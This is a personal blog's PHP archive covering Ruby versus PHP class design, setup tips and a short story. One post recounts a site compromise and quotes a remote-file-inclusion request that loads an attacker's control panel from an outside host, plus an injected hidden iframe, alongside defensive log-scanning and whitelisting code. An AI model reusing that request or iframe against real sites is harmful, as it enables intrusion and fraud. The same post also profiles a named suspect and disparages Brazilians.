soledad penadés
repeat 4[fd 100 rt 90]

Archive for the ‘php’ Category

20070122 PHP will never have a (real) Rails-like framework

I know the title is harsh but it's so true. At least it is with PHP's current implementation of classes and objects, which does not let you "reopen" an existing class definition to add or redefine methods, which is the basis upon which Rails (and I presume lots of other applications and frameworks) is built.

This Ruby feature managed to freak me out when I first read about it. Redefining an existing class? Who would think of it as a good idea? Where are the maintainability and the good practices of object oriented programming? How can we rely on some class behaving as expected if some piece of code is changing its internal behaviour?

But then I got the answer - when used within reason, this allows you to extend existing classes. Extend. Morph. Adapt. Improve. Refine. Lots of concepts which started jumping around me and made me understand all of a sudden how Rails plugins worked so seamlessly, without having to do any extra include, or without having to touch Rails' very core files, or defining hooks at certain places. If you don't like some aspect of Active Record, you could write a plugin which overwrites that behaviour - only that one. The rest remains the same.

The aesthetics are somewhat shocking for PHP-only programmers. It's something like this:

class A
  def hello_world
    puts "I'm hello_world"
  end
end

Any instance of A running hello_world will output "I'm hello_world".

But if you add this anywhere after the definition of A

class A
  # Reopening A replaces the earlier definition of hello_world
  def hello_world
    puts "I'm hello_world v2"
  end
end

and run hello_world again, you will get "I'm hello_world v2". This is definitely impossible to do in PHP - you would get a "Fatal error: Cannot redeclare class" error as soon as you tried to "reopen" a class and add or redefine some methods.

While this is not a problem for the average use of PHP, it turns out to be the opposite when you want to do something smart with PHP 5's new and shiny object model. Something like, for example, building a cool framework like Rails.

There have been some attempts already, like for example CakePHP or Symfony. I just have experience with CakePHP and while it is magnificently built (given that it maintains compatibility with PHP 4 and PHP 5) it will never reach the whole expressivity and power that Rails has.

A quick example is the AppModel class. AppModel is CakePHP's equivalent of ActiveRecord::Base. In Rails, when you declare a model you just extend ActiveRecord. Simple as that; you don't need extra stuff in the middle. In CakePHP you need to extend AppModel, and if you want to modify AppModel in your application, you have to write a new AppModel.php - which Cake will load instead of the default, empty one. Yes, AppModel is an empty class whose sole purpose is extending Model (which has the real ActiveRecord-like methods). That doesn't sound very flexible.

So in the end, AppModel is no more than a simple intermediate step for working around PHP's inability to redefine the underlying class, that is, Model. We need to add an extra class in the middle for each level that you anticipate the user of your classes will want to redefine or extend.

Meanwhile, in Rails you would just add some code in the plugins directory with the new functions for ActiveRecord, and your models would still extend ActiveRecord::Base. No extra levels of hierarchy whatsoever.

Another interesting example is the famous acts_as_taggable plugin, which allows programmers to add the ability to tag items (i.e. ActiveRecord models) just by adding a single line of code to the model (acts_as_taggable), using ruby's ability to reopen classes and add a series of new methods to existing models.

Even more, there are some Ruby core classes, like Date, to which Rails adds new methods, while they still belong to the Date object, not an artificial AppDate intermediate object in the middle, and without modifying Ruby's core files. Isn't it beautiful?

And before you discard my arguments as biased towards Rails, there are more languages which allow for classes to be reopened, like JavaScript (and I believe ActionScript was like that before, don't know about ActionScript 3). These flexible languages have allowed people to write such amazing stuff as Prototype or Script.aculo.us, by making use of the redefinition and extension of existing classes.

So that's why I say that PHP is not flexible and will never have a real Rails-like framework :-)

Hope it's clearer now…

20061209 XSL with PHP in Ubuntu

XSL support in php5 is deactivated by default. Go to Synaptic Package Manager and search for php5-xsl. Mark the package for installation, apply the changes and once it's finished, don't forget to restart the server!

sudo /usr/sbin/apache2 -k restart

More XSL stories later on… time to experiment :)

20061112 Bricks and ruled paper (a short story)

Two authors were discussing their writing methods and, especially, the paper they used to write on. The first writer (let's call him Phil) used to prepare his ruled paper sheets himself, because -he argued- it was the only method to know exactly how the rules were spread across each sheet, so he could control the height between lines, the amount and exact tone of the ink used to print the rules, etc. The second writer (called Rube) used to prepare the ruled paper but he gave up quickly and decided to just buy ruled paper notebooks, so that he could concentrate on the actual writing instead of the rules alignment.

In the end, Phil's home-made sheets were just quite messy and didn't look as professional and serious as Rube's. Rube was always able to deliver the books on time, while Phil spent hours and hours improving his custom-made method for drawing rules and making sure it was efficient and fast. Often the method failed and he had to restart from scratch.

No wonder: Phil's father was a very weird architect who believed in making his own bricks. He took it with lots of dedication and pride but was only able to finish a couple of buildings in his life. Going up the family tree, Phil's grandfather was a mechanic who absolutely defended the need to build one's own wheels and tyres and re-engineer their design with every new patron who came to his little workshop.

Phil thinks Rube is a pretentious arrogant guy trying to impress women at any of the multiple social events which he can attend (as he's got lots of free time thanks to just using conventional ruled paper when writing), and would like to be able to say this to the entire world but he's just too busy drawing lines to do any actual work in the end.

20060806 Wrong location of mysql.sock?

I was trying to run the bake script (for CakePHP!) and it started complaining about not finding /var/mysql/mysql.sock - but why this path? I already had problems with the MySQL socket and Ruby on Rails. At that time, I was using xampp for Apache, PHP and MySQL, so the MySQL socket was inside the xampp folder and I could solve it thanks to ccm (see the post if you feel curious).

But last week I decided I was fed up with xampp and not knowing where things are, and more especially, not having a working version of Apache with mod_rewrite, so I went for the hard way and compiled and installed all from scratch (Apache, PHP, MySQL). Then what happened is that the MySQL socket is now in /tmp/mysql.sock but for some reason Cake (and obviously PHP) is looking for the socket in /var/mysql/mysql.sock. Why, I don't know - since the application I'm developing works perfectly (I presume that's because it's running in a virtual host and thus PHP doesn't try to connect with localhost but with http, as it believes that it's not localhost actually).

In any case, it's just bake which fails.

Well, it was just bake which failed, since I decided to solve it all quickly. Did it want a socket in /var/mysql/mysql.sock?

There you go! Open a terminal and…

cd /var
sudo mkdir mysql   # only if a mysql directory doesn't exist there
sudo ln -s /tmp/mysql.sock /var/mysql/mysql.sock

Bye bye error! Now enjoy bake!

This trick is maybe dirty but I'm fed up with running ./configure and friends. If you know why it failed before, you can leave a comment… and I'll appreciate it much :)

20060528 Idiots with nothing to do

We just found some html attached to the end of every html and php file for almost all of our sites. How come, we asked?

I took a look at the server logs for every domain. I was looking for a POST request, since I figured out that it must have been some script kiddie trying to break into our pages with this dumb method. In little time I found it, something as suspicious as the following:

201.13.14.216 - - [27/May/2006:22:40:52 +0000] "GET /index.php?go=http%3A%2F%2Fwww.tnwhunters.com%2Fcmd01.txt%3F&&s=r&cmd=dir&dir=. HTTP/1.1" 200 3819 "-" "Mozilla/5.0 (X11; U; Linux i686; pt-BR; rv:1.7.7) Gecko/20050421 Firefox/1.0.3 (Debian package 1.0.3-2)"

If you open the included URL (http://www.tnwhunters.com/cmd01.txt) you see that the server is returning a plain text file which was interpreted as PHP by the script in neonv2, hence making all the code that he put in that file available to him. (Obviously we fixed it immediately and you can't do it anymore.) Also, the site on that server is about animal hunting, which is completely off-topic. Weird…

That code (take a look, it won't open any pop-up… it's simple plain text) is a complete control panel for wannabe hackers. They just need to look for a site with a simple method of loading sections (i.e., including one file depending on the current section) and just exploit it, by getting their control panel loaded. Which curiously is half written in Brazilian. The IP of the idiot also corresponds to Brazil, Sao Paulo, as verified by dnsstuff.

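A way to pull requests like the one quoted above out of an access log, as an added example that is not part of the original post. It flags any query parameter whose decoded value is a URL; the function name `remote_url_params` is hypothetical, the second log line is constructed, the user agent is shortened, and PHP 7.1 or later on the command line is assumed.

```php
<?php
// Added example: find access-log requests that pass a URL as a parameter
// value, which is the shape of the request quoted in the post.

// Returns the names of query parameters whose decoded value starts with a
// URL scheme ("http://", "ftp://", ...), or [] when there are none.
function remote_url_params(string $logLine): array
{
    // Combined log format: the request line is the first quoted field.
    if (!preg_match('/"(?:GET|POST|HEAD) (\S+) HTTP\/[\d.]+"/', $logLine, $m)) {
        return [];
    }
    $pos = strpos($m[1], '?');
    if ($pos === false) {
        return [];                       // no query string at all
    }
    $hits = [];
    foreach (explode('&', substr($m[1], $pos + 1)) as $pair) {
        if ($pair === '') {
            continue;                    // tolerate "&&" as in the logged request
        }
        [$name, $value] = array_pad(explode('=', $pair, 2), 2, '');
        // Decode twice so that double-encoded values are still caught.
        $decoded = rawurldecode(rawurldecode($value));
        if (preg_match('#^\s*[a-z][a-z0-9+.\-]*://#i', $decoded)) {
            $hits[] = rawurldecode($name);
        }
    }
    return $hits;
}

// Sample input: the request from the post and one constructed normal request.
$lines = [
    '201.13.14.216 - - [27/May/2006:22:40:52 +0000] "GET /index.php?go=http%3A%2F%2Fwww.tnwhunters.com%2Fcmd01.txt%3F&&s=r&cmd=dir&dir=. HTTP/1.1" 200 3819 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [27/May/2006:22:41:10 +0000] "GET /index.php?go=contact HTTP/1.1" 200 2110 "-" "Mozilla/5.0"',
];
foreach ($lines as $line) {
    $hits = remote_url_params($line);
    if ($hits) {
        $ip = strtok($line, ' ');        // client address is the first field
        echo "$ip suspicious parameter(s): ", implode(', ', $hits), "\n";
    }
}
```

A hit is a triage signal rather than proof: parameters that legitimately carry URLs (redirect targets, for instance) will also match, so the 200 status and what the script does with the parameter decide whether it matters.
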
The question is, why did this idiot add this piece of HTML to every page and script? Not for becoming famous, since the script doesn't produce any visible output. No. It's because he wanted to earn money. So he added code like this:

iframe width=0 height=0 frameborder=0 xsrc=http://www.free20.com/portal/index.php?aff=soauker marginwidth=0 …

This code apparently belongs to an affiliate programme (based in China) in which he would get paid for each impression the servers at free20 received with his affiliate program. As he included it in an iframe, the page was loaded on the users' computers but never seen, since the iframe dimensions are 0×0 pixels. But he is so stupid that he uses the same affiliate code as the nick he uses for:

It is easy to confirm that both soauker's are the same even if they don't have the same e-mail addresses because he still uses "Adivinha seuburro" as faked name, both in the security announcement and in this forum post as well. Curiously, the forum is related to FreeBSD and in his attacks he used a *nix system, Debian. All matches.

There are also some posts in the forum of a Computer Science institute with the same nick, Soauker. Although the page does not exist anymore, Google's cache can show you his favourite topics, which still relate to Linux. So maybe someone at the Instituto de Informática - PUCMINAS knows a guy who studied there in 2004 and was deeply interested in hacking and *nix systems.

So Brazilians didn't have enough with spamming our nice Orkut scrapbooks with crap messages, now they also try to earn money the quick way. Ridiculous…

It is a pity that I can't find any website or abuse e-mail address for his internet provider so I could send them the logs he produced, but anyway I hope this is useful for someone.

Final advice: always always always filter input arguments for your script.
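What filtering the input can look like for a section loader of the kind described above, as an added example that is not the site's or the author's code. The `go` parameter name comes from the logged request; the section names, file paths and the function `resolve_section` are hypothetical, and PHP 7 or later is assumed.

```php
<?php
// Added example. Assumed vulnerable pattern (the post does not show the
// site's code): index.php hands the "go" parameter straight to include,
//     include $_GET['go'];
// so a URL in "go" is fetched and run as PHP when the configuration
// allows remote includes.

// Hypothetical section names and file layout.
const SECTIONS = [
    'home'    => 'sections/home.php',
    'news'    => 'sections/news.php',
    'contact' => 'sections/contact.php',
];

// Map the request parameter to a file chosen by the application.
// The user's value is only ever a lookup key, never part of a path.
function resolve_section($requested): string
{
    if (!is_string($requested) || !array_key_exists($requested, SECTIONS)) {
        return SECTIONS['home'];   // unknown, missing or array-valued input
    }
    return SECTIONS[$requested];
}

// Constructed inputs, including the value from the logged request.
$inputs = [
    'news',
    'http://www.tnwhunters.com/cmd01.txt?',
    '../../config.php',
    ['news'],                      // ?go[]=news arrives as an array
    null,                          // parameter absent
];
foreach ($inputs as $input) {
    printf(
        "%-42s -> %s\n",
        json_encode($input, JSON_UNESCAPED_SLASHES),
        resolve_section($input)
    );
}

// In index.php the include would then read:
//     include __DIR__ . '/' . resolve_section($_GET['go'] ?? null);
```

Keeping `allow_url_include = Off` in php.ini (the default since PHP 5.2) is a second layer, but the lookup table also covers local path tricks that the setting does not.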

And for Soauker: GET A FUCKING LIFE!